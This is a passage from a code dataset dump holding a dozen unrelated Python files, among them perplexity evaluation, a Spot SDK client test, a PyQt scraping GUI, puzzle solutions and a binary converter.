self.tracked_obj\n","repo_name":"andresprados/SPIGA","sub_path":"spiga/demo/analyze/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":212,"dataset":"github-code","pt":"61"} +{"seq_id":"37269343583","text":"import numpy as np\nfrom PIL import ImageQt, Image\nfrom PySide6.QtGui import QPixmap\n\n\ndef get_triangle_img_wo_border(\n mask: np.ndarray, qpixmap: QPixmap,\n value_zero_zone=0, channels_count=4) -> QPixmap:\n image = qpixmap.toImage()\n b = image.bits()\n arr = np.frombuffer(b, np.uint8).reshape(mask.shape[0], mask.shape[1], channels_count)\n arr *= np.expand_dims((mask == value_zero_zone), axis=-1)\n arr = np.stack([arr[..., 2], arr[..., 1], arr[..., 0], arr[..., -1]], axis=-1)\n return QPixmap(ImageQt.ImageQt(Image.fromarray(arr)))\n","repo_name":"TaplierShiru/QtPuzzleGame","sub_path":"puzzle/utils/image_cutter_tools/img2img_wo_borders.py","file_name":"img2img_wo_borders.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23463537411","text":"def readTestset(testset):\r\n fo = open(testset,'r+')\r\n line = fo.readline()\r\n testCases = int(line)\r\n print(\"test cases:\\t\", testCases)\r\n infoList = []\r\n for i in range(testCases):\r\n line = fo.readline()\r\n infoList.append(line.split())\r\n return infoList\r\n\r\n\r\ninfoList = readTestset('D-small-attempt2.in')\r\nprint(infoList)\r\n\r\ndef solveOneLine(lineList):\r\n x = int(lineList[0])\r\n r = int(lineList[1])\r\n c = int(lineList[2])\r\n\r\n maxRC = max(r,c)\r\n minRC = min(r,c)\r\n\r\n if (x > maxRC) or ((r*c)%x != 0) or (x >= (2*minRC + 1)) or (x >= 7) or (x > 3 and minRC == 2):\r\n return \"RICHARD\"\r\n else:\r\n return \"GABRIEL\"\r\n \r\nf = open('result','w')\r\nfor i in range(len(infoList)):\r\n f.write(\"Case #\")\r\n f.write(str(i+1))\r\n f.write(\": \")\r\n f.write(str(solveOneLine(infoList[i])))\r\n f.write('\\n')\r\n\r\nprint(\"closing\")\r\nf.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_158/1013.py","file_name":"1013.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1021884237","text":"\"\"\"Evaluate's perplexity but we pass in the model and tokenizer\"\"\"\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom evaluate import logging\nfrom torch.nn import CrossEntropyLoss\nfrom tqdm import 
tqdm\n\n\ndef eval_perplexity(\n predictions,\n model,\n tokenizer,\n batch_size: int = 16,\n add_start_token: bool = True,\n device=None,\n max_length=None,\n):\n if device is not None:\n assert device in [\n \"gpu\",\n \"cpu\",\n \"cuda\",\n ], \"device should be either gpu or cpu.\"\n if device == \"gpu\":\n device = \"cuda\"\n else:\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n # if batch_size > 1 (which generally leads to padding being required), and\n # if there is not an already assigned pad_token, assign an existing\n # special token to also be the padding token\n if tokenizer.pad_token is None and batch_size > 1:\n existing_special_tokens = list(tokenizer.special_tokens_map_extended.values())\n # check that the model already has at least one special token defined\n assert (\n len(existing_special_tokens) > 0\n ), \"If batch_size > 1, model must have at least one special token to use for padding. Please use a different model or set batch_size=1.\"\n # assign one of the special tokens to also be the pad token\n tokenizer.add_special_tokens({\"pad_token\": existing_special_tokens[0]})\n\n if add_start_token and max_length:\n # leave room for <BOS> token to be added:\n assert (\n tokenizer.bos_token is not None\n ), \"Input model must already have a BOS token if using add_start_token=True. Please use a different model, or set add_start_token=False\"\n max_tokenized_len = max_length - 1\n else:\n max_tokenized_len = max_length\n\n encodings = tokenizer(\n predictions,\n add_special_tokens=False,\n padding=True,\n truncation=True if max_tokenized_len else False,\n max_length=max_tokenized_len,\n return_tensors=\"pt\",\n return_attention_mask=True,\n ).to(device)\n\n encoded_texts = encodings[\"input_ids\"]\n attn_masks = encodings[\"attention_mask\"]\n\n # check that each input is long enough:\n if add_start_token:\n assert torch.all(\n torch.ge(attn_masks.sum(1), 1)\n ), \"Each input text must be at least one token long.\"\n else:\n assert torch.all(\n torch.ge(attn_masks.sum(1), 2)\n ), \"When add_start_token=False, each input text must be at least two tokens long. 
Run with add_start_token=True if inputting strings of only one token, and remove all empty input strings.\"\n\n ppls = []\n loss_fct = CrossEntropyLoss(reduction=\"none\")\n\n for start_index in logging.tqdm(range(0, len(encoded_texts), batch_size)):\n end_index = min(start_index + batch_size, len(encoded_texts))\n encoded_batch = encoded_texts[start_index:end_index]\n attn_mask = attn_masks[start_index:end_index]\n\n if add_start_token:\n bos_tokens_tensor = torch.tensor(\n [[tokenizer.bos_token_id]] * encoded_batch.size(dim=0)\n ).to(device)\n encoded_batch = torch.cat([bos_tokens_tensor, encoded_batch], dim=1)\n attn_mask = torch.cat(\n [\n torch.ones(bos_tokens_tensor.size(), dtype=torch.int64).to(device),\n attn_mask,\n ],\n dim=1,\n )\n\n labels = encoded_batch\n\n with torch.no_grad():\n out_logits = model(encoded_batch, attention_mask=attn_mask).logits\n\n shift_logits = out_logits[..., :-1, :].contiguous()\n shift_labels = labels[..., 1:].contiguous()\n shift_attention_mask_batch = attn_mask[..., 1:].contiguous()\n\n perplexity_batch = torch.exp(\n (\n loss_fct(shift_logits.transpose(1, 2), shift_labels)\n * shift_attention_mask_batch\n ).sum(1)\n / shift_attention_mask_batch.sum(1)\n )\n\n ppls += perplexity_batch.tolist()\n\n return np.mean(ppls)\n # return {\"perplexities\": ppls, \"mean_perplexity\": np.mean(ppls)}\n\n\ndef batched_perplexity(texts, model, tokenizer, batch_size, max_length, stride):\n device = model.device\n tokenized_inputs = tokenizer(texts, truncation=False)[\"input_ids\"]\n all_token_ids = []\n for tokenized_input in tokenized_inputs:\n all_token_ids.extend(tokenized_input + [tokenizer.eos_token_id])\n\n text_len = len(all_token_ids)\n token_ids = torch.LongTensor(all_token_ids)\n lls = []\n n_samples = 0\n\n for i in tqdm(range(0, text_len, batch_size * stride)):\n begin_locs, end_locs, trg_lens = [], [], []\n for j in range(batch_size):\n j = i + j * stride\n if j >= text_len:\n break\n begin_loc = max(j + stride - max_length, 0)\n end_loc = min(j + stride, text_len)\n trg_len = end_loc - j # may be different from stride on last loop\n\n begin_locs.append(begin_loc)\n end_locs.append(end_loc)\n trg_lens.append(trg_len)\n\n input_ids = [token_ids[b:e] for b, e in zip(begin_locs, end_locs)]\n target_end_locs = [sen.size(0) for sen in input_ids]\n input_ids = [\n F.pad(sen, (0, max_length - sen.size(0)), \"constant\", 0)\n for sen in input_ids\n ] # we dont need attention mask as long as these padded token is not involved in loss calculation\n input_ids = torch.stack(input_ids, dim=0).to(device)\n\n target_ids = (\n torch.ones_like(input_ids) * -100\n ) # -100 is the default ingore_index value in torch.nn.CrossEntropyLoss\n for index, (b, e) in enumerate(zip(trg_lens, target_end_locs)):\n labels = input_ids[index, -b:e].clone()\n target_ids[index, -b:e] = labels\n\n with torch.no_grad():\n outputs = model(input_ids, labels=target_ids)\n log_likelihood = outputs.loss * sum(trg_lens)\n\n n_samples += input_ids.size(0)\n lls.append(log_likelihood)\n\n ppl = torch.exp(torch.stack(lls).sum() / end_locs[-1])\n return ppl\n\n\ndef unbatched_perplexity(texts, model, tokenizer, max_length, stride):\n tokenized_inputs = tokenizer(texts, truncation=False)[\"input_ids\"]\n all_token_ids = []\n for tokenized_input in tokenized_inputs:\n all_token_ids.extend(tokenized_input + [tokenizer.eos_token_id])\n\n token_ids = torch.LongTensor(all_token_ids)\n\n seq_len = len(token_ids)\n\n nlls = []\n prev_end_loc = 0\n for begin_loc in tqdm(range(0, seq_len, stride)):\n end_loc 
= min(begin_loc + max_length, seq_len)\n trg_len = end_loc - prev_end_loc # may be different from stride on last loop\n input_ids = token_ids[begin_loc:end_loc].unsqueeze(0).to(\"cuda\")\n target_ids = input_ids.clone()\n target_ids[:, :-trg_len] = -100\n\n with torch.no_grad():\n outputs = model(input_ids, labels=target_ids)\n\n # loss is calculated using CrossEntropyLoss which averages over valid labels\n # N.B. the model only calculates loss over trg_len - 1 labels, because it internally shifts the labels\n # to the left by 1.\n neg_log_likelihood = outputs.loss\n\n nlls.append(neg_log_likelihood)\n\n prev_end_loc = end_loc\n if end_loc == seq_len:\n break\n\n ppl = torch.exp(torch.stack(nlls).mean())\n\n return ppl\n","repo_name":"mnoukhov/elastic-reset","sub_path":"stackllama/perplexity.py","file_name":"perplexity.py","file_ext":"py","file_size_in_byte":7525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13035612403","text":"import concurrent\n\nimport grpc\nimport pytest\n\nimport bosdyn.client.auto_return\nfrom bosdyn.api.auto_return import auto_return_pb2, auto_return_service_pb2_grpc\n\nfrom . import helpers\n\n\nclass MockAutoReturnServicer(auto_return_service_pb2_grpc.AutoReturnServiceServicer):\n\n def __init__(self):\n super(MockAutoReturnServicer, self).__init__()\n self.active_configuration_request = None\n self.leases = None\n\n def GetConfiguration(self, request, context):\n response = auto_return_pb2.GetConfigurationResponse()\n helpers.add_common_header(response, request)\n if self.active_configuration_request:\n response.request.CopyFrom(self.active_configuration_request)\n response.enabled = True\n return response\n\n def Configure(self, request, context):\n response = auto_return_pb2.ConfigureResponse()\n helpers.add_common_header(response, request)\n if request.params.max_displacement <= 0:\n response.invalid_params.max_displacement = request.params.max_displacement\n response.status = auto_return_pb2.ConfigureResponse.STATUS_INVALID_PARAMS\n else:\n response.status = auto_return_pb2.ConfigureResponse.STATUS_OK\n self.active_configuration_request = request\n self.leases = request.leases\n return response\n\n\n@pytest.fixture(scope='function')\ndef client():\n return bosdyn.client.auto_return.AutoReturnClient()\n\n\n@pytest.fixture(scope='function')\ndef service():\n return MockAutoReturnServicer()\n\n\n@pytest.fixture(scope='function')\ndef server(client, service):\n server = grpc.server(concurrent.futures.ThreadPoolExecutor(max_workers=1))\n auto_return_service_pb2_grpc.add_AutoReturnServiceServicer_to_server(service, server)\n port = server.add_insecure_port('localhost:0')\n channel = grpc.insecure_channel('localhost:{}'.format(port))\n client.channel = channel\n server.start()\n return server\n\n\ndef test_simple(client, server, service):\n \"\"\"Test basic usage of the client.\"\"\"\n client.get_configuration()\n resp = client.get_configuration_async().result()\n assert not resp.enabled\n assert not resp.HasField('request')\n\n params = auto_return_pb2.Params()\n params.max_displacement = -1\n with pytest.raises(bosdyn.client.auto_return.InvalidParameterError):\n client.configure(params, leases=[])\n with pytest.raises(bosdyn.client.auto_return.InvalidParameterError):\n client.configure_async(params, leases=[])\n\n params.max_displacement = 12\n client.configure(params, leases=[])\n assert service.active_configuration_request.params.SerializeToString(\n ) == params.SerializeToString()\n # Test that 
the NoneType was overwritten with an iterable.\n assert len(service.leases) == 0\n\n resp = client.get_configuration()\n assert resp.request.params.SerializeToString() == params.SerializeToString()\n","repo_name":"boston-dynamics/spot-sdk","sub_path":"python/bosdyn-client/tests/test_auto_return_client.py","file_name":"test_auto_return_client.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":2148,"dataset":"github-code","pt":"61"} +{"seq_id":"34290878813","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Aug 15 00:57:25 2021\r\n\r\n@author: Daneshjoei\r\n\"\"\"\r\n\"\"\"example 92:\r\n A number chain is created by continuously \r\n adding the square of the digits in a number\r\n to form a new number until it has been seen before.\r\n\r\n For example,\r\n\r\n 44 → 32 → 13 → 10 → 1 → 1\r\n 85 → 89 → 145 → 42 → 20 → 4 → 16 → 37 → 58 → 89\r\n\r\n Therefore any chain that arrives at 1 or 89 will\r\n become stuck in an endless loop. What is most \r\n amazing is that EVERY starting number will \r\n eventually arrive at 1 or 89.\r\n\r\n How many starting numbers below ten million will \r\n arrive at 89?\r\n\"\"\"\r\n#function gives the above process for one number\r\ndef SumOfSquareDigits(Num):\r\n while True:\r\n Sum=0\r\n Num_str=str(Num)\r\n for i in Num_str:\r\n Sum+=int(i)**2\r\n if Sum==89:\r\n return True\r\n if Sum==1:\r\n return False\r\n Num=Sum\r\n\r\n#test: print (s(44))\r\n\r\ncounter=0 \r\nfor i in range(2,10000000):\r\n if SumOfSquareDigits(i):\r\n counter+=1\r\nprint (counter)\r\n ","repo_name":"mehrad31415/Project-Euler","sub_path":"ex_92.py","file_name":"ex_92.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37659380141","text":"#Kushendra and Shulamit worked on this\n\nimport random\n\ndef build_random_list(size, max_value):\n l = []\n i= 0\n while i < size:\n l.append(random.randrange(0,max_value))\n i = i+1\n return l\n\ndef largest(l, max):\n print(l)\n i = 0\n while i < len(l):\n if l[i] == max:\n return i\n else:\n i +=1\nprint(largest(build_random_list(15,11), 10))\n\ne = build_random_list(15,10)\ndef freq(l, value):\n count = 0\n for item in l:\n if item == value:\n count +=1\n else:\n pass\n return count\n\nprint(e)\nprint(freq(build_random_list(15,10), 7))\n\nf = build_random_list(30,16)\ndef mode(l):\n s = 0\n final_mode = 0\n for i in l:\n mode = freq(l, i)\n if mode >= s:\n s = mode\n final_mode = i\n return final_mode\n \nprint(f)\nprint(mode(f))\n","repo_name":"Kushendra1/csci127-assignments","sub_path":"hw_06/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18599425549","text":"import sys\n\nT=int(sys.stdin.readline())\n\n\n\ndef result(case):\n mother=max(case[0],case[1])\n child=min(case[0],case[1])\n differ=mother%child\n if mother==case[0]:\n answer_mother=case[2]\n answer_child=case[3]\n else:\n answer_mother=case[3]\n answer_child=case[2]\n if answer_mother>child:\n start=answer_mother-child\n else:\n start=answer_mother\n visited={}\n #print(\"start={}\".format(start))\n for i in range(child):\n if (start+(i*differ))%child in visited:\n break;\n visited[(start+(i*differ))%child]=i\n #print(visited)\n if answer_child%child not in visited:\n return -1\n #print(visited)\n answer=mother*visited[answer_child%child]+answer_mother\n return answer\n\n\n\nfor i in 
range(T):\n case=list(map(int,sys.stdin.readline().rstrip().split(\" \")))\n print(result(case))\n\n\n\n\n","repo_name":"Andrevile/Algorithm","sub_path":"BOJ PS/No.6064 카잉달력.py","file_name":"No.6064 카잉달력.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71305079236","text":"import sys\nfrom PyQt6.QtCore import QObject, QThread, pyqtSignal, pyqtSlot\nimport logging\nimport traceback \n\n\nfrom PyQt6.QtWidgets import (\n QApplication,\n QGridLayout,\n QPushButton,\n QWidget,\n QVBoxLayout,\n QCheckBox,\n QHBoxLayout,\n QMessageBox,\n QGroupBox,\n QComboBox,\n QLabel,\n QProgressBar,\n QPlainTextEdit,\n QLineEdit,\n QFileDialog,\n)\n\nfrom ffscrapper.ui_options import generate_breadth_search_options\nfrom scrapper import Scrapper\n\nlogging.basicConfig(filename=\"debug.log\", level=logging.DEBUG)\n\n\nclass Worker(QObject):\n finished = pyqtSignal()\n progress = pyqtSignal(int)\n warningText = pyqtSignal(str)\n enableButton = pyqtSignal(bool)\n\n def __init__(self, scrapper, message_function, app):\n super().__init__()\n self.scrapper = scrapper\n self.message_function = message_function\n self.app = app\n\n def run(self):\n try:\n self.scrapper.scrape()\n self.enableButton.emit(True)\n except:\n logging.error(\"Klaida:\" + str(sys.exc_info()))\n traceback.print_exc() \n self.app.analyse.setEnabled(True)\n self.warningText.emit(\"Programoje įvyko klaida!\")\n\n\nclass Signaller(QObject):\n signal = pyqtSignal(str)\n\n\nclass QTextEditLogger(logging.Handler):\n def __init__(self, parent, slotfunc):\n super().__init__()\n self.widget = QPlainTextEdit(parent)\n self.widget.setReadOnly(True)\n self.signaller = Signaller()\n self.signaller.signal.connect(slotfunc)\n\n def emit(self, record):\n msg = self.format(record)\n # thread safe\n self.signaller.signal.emit(msg)\n\n\nclass App(QWidget):\n def createLayoutForTables(self, outerUpperLayout):\n groupbox = QGroupBox(\"Lentelės\")\n outerUpperLayout.addWidget(groupbox, 0, 0)\n fileSelectLayout = QVBoxLayout()\n\n groupbox.setLayout(fileSelectLayout)\n # Store ids\n btn = QPushButton(\"Parduotuvių lentelė\")\n btn.clicked.connect(self.getFileForStoreIds)\n fileSelectLayout.addWidget(btn)\n\n # FF table\n btn = QPushButton(\"FF produktų lentelė\")\n btn.clicked.connect(self.getFileForFFProducts)\n fileSelectLayout.addWidget(btn)\n\n # Producs\n btn = QPushButton(\"Produktų lentelė\")\n btn.clicked.connect(self.getFileForProducts)\n fileSelectLayout.addWidget(btn)\n\n # FF Price\n btn = QPushButton(\"FF kainodaros lentelė\")\n btn.clicked.connect(self.getFileForFFPrice)\n fileSelectLayout.addWidget(btn)\n\n e1 = QLineEdit()\n fileSelectLayout.addWidget(e1)\n self.designer_id = e1\n\n def createLayoutForAdditionalOptions(self, outerUpperLayout):\n groupbox = QGroupBox(\"Papildomi nustatymai\")\n outerUpperLayout.addWidget(groupbox, 0, 1)\n\n optionsLayout = QVBoxLayout()\n groupbox.setLayout(optionsLayout)\n\n for option_id, widget in self.extra_options.items():\n optionsLayout.addWidget(widget)\n\n boxLayout = QHBoxLayout()\n optionsLayout.addLayout(boxLayout)\n\n boxLayout.addWidget(QLabel(\"Regionas\"))\n boxLayout.addWidget(self.region_select_combo_box)\n\n def createOutputTableLayout(self, outerUpperLayout):\n groupbox = QGroupBox(\"Analizės rezultatai\")\n outerUpperLayout.addWidget(groupbox, 0, 2)\n fileSelectLayout = QVBoxLayout()\n\n groupbox.setLayout(fileSelectLayout)\n btn = QPushButton(\"Pagrindinė lentelė\")\n 
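# clicking opens a save-location dialog for the main results table\n        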
btn.clicked.connect(self.getFileForSaveMainTable)\n fileSelectLayout.addWidget(btn)\n\n def createLayoutForCheckboxes(self, outerUpperLayout):\n groupbox = QGroupBox(\"Analizės apimtis\")\n outerUpperLayout.addWidget(groupbox, 1, 0, 1, 3)\n\n horizontalBox = QHBoxLayout()\n groupbox.setLayout(horizontalBox)\n\n menOptionsLayout = QVBoxLayout()\n\n for option_id, widget in self.scrape_breadth_options.items():\n if option_id.startswith(\"men\"):\n menOptionsLayout.addWidget(widget[\"checkbox\"])\n\n horizontalBox.addLayout(menOptionsLayout)\n\n womensOptionsLayout = QVBoxLayout()\n\n for option_id, widget in self.scrape_breadth_options.items():\n if option_id.startswith(\"women\"):\n womensOptionsLayout.addWidget(widget[\"checkbox\"])\n\n horizontalBox.addLayout(womensOptionsLayout)\n\n kids = QVBoxLayout()\n\n for option_id, widget in self.scrape_breadth_options.items():\n if not option_id.startswith(\"women\") and not option_id.startswith(\"men\"):\n kids.addWidget(widget[\"checkbox\"])\n\n horizontalBox.addLayout(kids)\n\n def addUpperUIPortion(self):\n outerUpperLayout = QGridLayout()\n self.createLayoutForTables(outerUpperLayout)\n self.createLayoutForAdditionalOptions(outerUpperLayout)\n self.createOutputTableLayout(outerUpperLayout)\n self.createLayoutForCheckboxes(outerUpperLayout)\n\n # start scrapping button\n self.analyse.clicked.connect(self.scrape)\n outerUpperLayout.addWidget(self.analyse, 2, 0, 2, 3)\n\n return outerUpperLayout\n\n def addLowerUIPortion(self):\n outerDownLayout = QGridLayout()\n outerDownLayout.addWidget(self.progress_bar)\n\n self.logTextBox = QTextEditLogger(self, self.update_status)\n self.logTextBox.setFormatter(\n logging.Formatter(\"%(asctime)s - %(levelname)s - %(message)s\")\n )\n logging.getLogger().addHandler(self.logTextBox)\n logging.getLogger().setLevel(logging.DEBUG)\n\n outerDownLayout.addWidget(self.logTextBox.widget)\n return outerDownLayout\n\n def __init__(self):\n super().__init__()\n # self.thread = QThread()\n self.title = \"FF Produktų analizė\"\n self.left = 10\n self.top = 10\n self.width = 2000\n self.height = 480\n\n self.products_from_ff_table = \"\"\n self.store_ids_table = \"\"\n self.products_table = \"\"\n self.ff_price_table = \"\"\n self.designer_id = None\n\n self.main_table_save_path = \"\"\n self.quantity_table_save_path = \"\"\n\n self.scrape_breadth_options = generate_breadth_search_options()\n\n self.region_select_combo_box = QComboBox()\n self.region_select_combo_box.addItems(\n [\"de\", \"ru\", \"lt\", \"pl\", \"uk\", \"lv\", \"ee\", \"it\"]\n )\n\n self.extra_options = {}\n self.extra_options[\"add_images\"] = QCheckBox(\"Pridėti paveiksliukus\")\n\n self.analyse = QPushButton(\"Analizuoti\")\n\n self.progress_bar = QProgressBar()\n self.progress_bar.setValue(0)\n self.progress_bar.setMinimum(0)\n self.progress_bar.setMaximum(100)\n\n self.initUI()\n\n def initUI(self):\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n\n super().__init__()\n\n outerUpperLayout = self.addUpperUIPortion()\n outerDownLayout = self.addLowerUIPortion()\n\n outerLayout = QGridLayout()\n outerLayout.addLayout(outerUpperLayout, 0, 0)\n outerLayout.addLayout(outerDownLayout, 1, 0)\n self.setLayout(outerLayout)\n\n self.show()\n\n def getFileForStoreIds(self):\n self.store_ids_table = self.getFileName()\n\n def getFileForFFProducts(self):\n self.products_from_ff_table = self.getFileName()\n\n def getFileForProducts(self):\n self.products_table = self.getFileName()\n\n def 
getFileForFFPrice(self):\n self.ff_price_table = self.getFileName()\n\n def getFileName(self):\n file_filter = \"Excel File (*.xlsx *.xls *.csv)\"\n response = QFileDialog.getOpenFileName(\n parent=self,\n caption=\"Pasirinkite reikiamą lentelę\",\n filter=file_filter,\n initialFilter=\"Excel File (*.xlsx *.xls)\",\n )\n return response[0]\n\n def getFileForSaveMainTable(self):\n self.main_table_save_path = self.saveFileDialog()\n\n def getFileForSaveQuantityTable(self):\n self.quantity_table_save_path = self.saveFileDialog()\n\n def saveFileDialog(self):\n # options = QFileDialog.options()\n # options = QFileDialog.DontUseNativeDialog\n fileName, _ = QFileDialog.getSaveFileName(\n self, \"QFileDialog.getSaveFileName()\", \"\", \"Excel File (*.xlsx)\"\n )\n if fileName:\n return fileName\n\n def scrape(self):\n if not self.store_ids_table:\n self.displayMessage(\"Error\", \"Pasirinkite parduotuvių lentelę\")\n return\n\n if not self.products_from_ff_table:\n self.displayMessage(\"Error\", \"Pasirinkite FF produktų lentelę\")\n return\n\n if not self.products_table:\n self.displayMessage(\"Error\", \"Pasirinkite produktų lentelę\")\n return\n\n if not self.ff_price_table:\n self.displayMessage(\"Error\", \"Pasirinkite FF kainodaros lentelę\")\n return\n\n if not self.main_table_save_path:\n self.displayMessage(\"Error\", \"Pasirinkite rezultatų lentelę\")\n return\n\n logging.info(\"Start\")\n logging.info(\"Store ids table: %s\", self.store_ids_table)\n logging.info(\"Products from ff table: %s\", self.products_from_ff_table)\n logging.info(\"Products table: %s\", self.products_table)\n logging.info(\"Rez table: %s\", self.main_table_save_path)\n logging.info(\"Region: %s\", self.region_select_combo_box.currentText())\n\n category_ids = [\n option[\"category_id\"]\n for option in self.scrape_breadth_options.values()\n if option[\"checkbox\"].isChecked()\n ]\n\n scrapper = Scrapper(\n store_ids_table=self.store_ids_table,\n products_table=self.products_table,\n products_from_ff_table=self.products_from_ff_table,\n ff_price_table=self.ff_price_table,\n main_table_save_path=self.main_table_save_path,\n quantity_table_save_path=self.quantity_table_save_path,\n categories_to_scrape=category_ids,\n scrape_quantity=True,\n add_images=self.extra_options[\"add_images\"].isChecked(),\n region=self.region_select_combo_box.currentText(),\n progress_bar_update_func=self.updateProgressBar,\n designer_id=self.designer_id.text(),\n )\n\n self.thread = QThread(parent=self)\n self.worker = Worker(scrapper, self.displayMessage, self)\n self.worker.moveToThread(self.thread)\n self.thread.started.connect(self.worker.run)\n self.worker.finished.connect(self.thread.quit)\n self.worker.finished.connect(self.worker.deleteLater)\n self.worker.warningText.connect(self._handleWarningText)\n self.worker.enableButton.connect(self._handleEnableButton)\n self.thread.finished.connect(self.thread.deleteLater)\n self.thread.start()\n\n # Final resets\n self.analyse.setEnabled(False)\n\n self.thread.finished.connect(\n lambda: self.stepLabel.setText(\"Long-Running Step: 0\")\n )\n\n def _handleWarningText(self, message):\n self.displayMessage(\"Error\", message)\n\n def _handleEnableButton(self, enabled):\n self.analyse.setEnabled(enabled)\n\n @pyqtSlot(str)\n def update_status(self, message):\n self.logTextBox.widget.appendPlainText(message)\n\n def displayMessage(self, status, message):\n QMessageBox.about(self, status, message)\n\n def updateProgressBar(self, value):\n self.progress_bar.setValue(value)\n\n\nif __name__ == 
\"__main__\":\n app = QApplication(sys.argv)\n ex = App()\n sys.exit(app.exec())\n","repo_name":"lavinski/FFScrapper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41255692243","text":"import os\n\n\ndef count_words(word, file_name):\n try:\n with open(file_name, encoding='UTF-8') as file_object:\n lines = file_object.readlines()\n except FileNotFoundError:\n print(\"你好,文件\" + file_name + \"不存在于当前目录。\")\n else:\n num_of_word = 0\n for line in lines:\n num_of_word = line.lower().count(word) + num_of_word\n return num_of_word\n\n\npath = os.getcwd() + \"\\\\book\\\\\"\nfile_list = os.listdir(path)\nfor file in file_list:\n num = count_words(\"the\", path + file)\n print(\"文件\"+file+\"中有单词‘the’\"+str(num)+\"个。\")","repo_name":"JaeZheng/learn_python","sub_path":"10/10-10.py","file_name":"10-10.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71443083073","text":"import pandas as pd\nimport os\nimport sys\n\n# If you want to group all CSV files that were downloaded by the tool, you can use this script\n# You need to copy this file to the folder where the tweets were downloaded and run it passing \n# as parameter the output filename: python group_tweets.py output.csv\n\nif len(sys.argv) == 1:\n raise Exception(\"Please, provide the output filename, e.g.: python group_tweets.py output.csv\")\n\ndf = pd.DataFrame()\nsep = '|'\n\nfor filename in os.listdir():\n if '.csv' in filename:\n temp_df = pd.read_csv(filename, sep=sep)\n\n df = pd.concat([df, temp_df])\n\ndf.sort_values(by='created_at', inplace=True)\n\nfilter_columns = {'lang':'en'}\n\nif filter_columns:\n for column in filter_columns:\n df = df[df[column] == filter_columns[column]]\n\ndf.to_csv(sys.argv[1], sep=sep)","repo_name":"GutoL/tweets_downloader","sub_path":"group_tweets.py","file_name":"group_tweets.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27159366009","text":"from configparser import ConfigParser\n\nimport torch\nimport torch.nn as nn\n\nfrom sample_ray import RaySamplerBox, RaySamplerNearFar\nfrom .nerf_network import NeRFNetwork\nfrom utils import logger\n\nlogger = logger.Logger(\"model/renderer\")\n\nclass Renderer(nn.Module):\n def __init__(self, config: ConfigParser):\n super(Renderer, self).__init__()\n\n self.num_coarse_sample = config.getint(\"model\", \"num_coarse_sample\")\n self.num_fine_sample = config.getint(\"model\", \"num_fine_sample\")\n self.sample_method = config.get(\"model\", \"sample_method\")\n\n #* NeRF, representing the scene as an MLP\n self.scene_net_coarse = NeRFNetwork(config)\n if config.getbool(\"model\", \"use_same_scene_net\"):\n self.scene_net_fine = self.scene_net_coarse\n else:\n self.scene_net_fine = NeRFNetwork(config)\n\n #* Ray sampling in coarse stage\n self.sample_method = config.get(\"model\", \"sample_method\")\n if self.sample_method == \"bbox\":\n self.ray_sampler = RaySamplerBox(self.num_coarse_sample)\n elif self.sample_method == \"near_far\":\n self.ray_sampler = RaySamplerNearFar(self.num_coarse_sample)\n else:\n raise ValueError(\"Wrong sample method, got {}.\".format(sample_method))\n\n #* Volumn rendering\n self.volumn_renderer = VolumeRenderer(config)\n\n def forward(self,):\n 
pass","repo_name":"ZhaoOfficial/CG","sub_path":"Neural Radiance Field/model/networks/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"22487062036","text":"##Tarea 24\n\n\n##función que convierte el número decimal en binario\ndef convierte_binario(decimalAconvertir):\n\t##creamos una lista para ir añadiendo los códigos binarios\n\tnumBinario= []\n\t##creamos una cadena donde neteremos el código binario resultante y será el valor que devuelva la función.\n\tcadenaBinaria = \"\"\n\t##asignamos el numero a convertir a la variable cociente\n\tcociente = decimalAconvertir\n\t##creamos una variable resto par albergar el resultado de la operación resto\n\tresto = 0\n\n\t##mediante un bucle vamos dividiendo el número a convertir entre 2 guardando el resto, el bucle se ejecutará mientras el número resultante se pueda dividir entre 2, es decir, mientras sea mayir que 1 \n\twhile cociente>1:\n\t\tresto = cociente%2\n\t\tcociente = cociente//2\n\t\t##añadimos el resto a la lista\n\t\tnumBinario.append(resto)\n\t\t\n\t#una vez terminada la ejecución del bucle añadimos el cociente que haya quedado\n\tnumBinario.append(cociente)\n\t##damos la vuelta a la lista para tener el código binario en el orden correcto\n\tnumBinario.reverse()\n\t##fomamos una cadean con los elementos de la lista, esta cadena será el resultado de la función\n\tfor n in numBinario:\n\t\tcadenaBinaria = cadenaBinaria + str(n)\n\treturn cadenaBinaria\n\n\nconvertir = \"S\"\n##mediante un bucle posibilitamos al usuario que pueda convertir más de un número digital \nwhile convertir == \"S\" or convertir == \"s\":\n\t##Pedimos al usuario que meta el número decimal a convertir\n\tnumeroDecimal = input(\"Introduce un nº decimal: \")\n\n\t#Comprobamos que el valor 